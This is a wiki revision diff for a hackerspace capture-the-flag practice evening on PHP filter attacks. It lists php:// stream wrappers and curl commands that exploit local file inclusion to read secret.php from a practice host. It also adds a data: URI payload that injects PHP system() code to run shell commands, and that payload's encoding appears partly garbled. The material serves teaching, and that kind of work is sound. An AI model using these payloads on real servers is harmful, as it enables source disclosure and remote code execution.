Difference between revisions of "CTF-practice-evening:2014-06-23"

From Technologia Incognita
Line 29: Line 29:
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
 +
** http://coolfire.insomnia247.nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
 +
** (
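Review bot: the added data: URI bullet carries no label saying what it demonstrates, unlike the two "php://filter LFI" bullets above it, and the second added bullet is only "** (", which reads as an unfinished entry. Give the new bullet a short description in the same style as its neighbours, and either complete or drop the trailing "** (" line. The percent-encoding in the added URL also looks damaged in places, so confirm it was pasted intact before saving the revision.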

Revision as of 18:37, 23 June 2014

CTF-practice-evening:2014-06-23
Date: 2014/06/23
Time:
Location: ACTA
Type: Workshop
Contact: Melanie

Capture The Flag evening - Part 20

  • 23 June, 2014 - 7 PM
  • Please bring a laptop with you!!!

General CTF Info

PHP Filter attacks

  • Coolfire is providing the content for this evening!  :-)
  • PHP commands (php:// stream wrappers):
    • php://input
    • php://output
    • php://fd
    • php://memory
    • php://temp
    • php://filter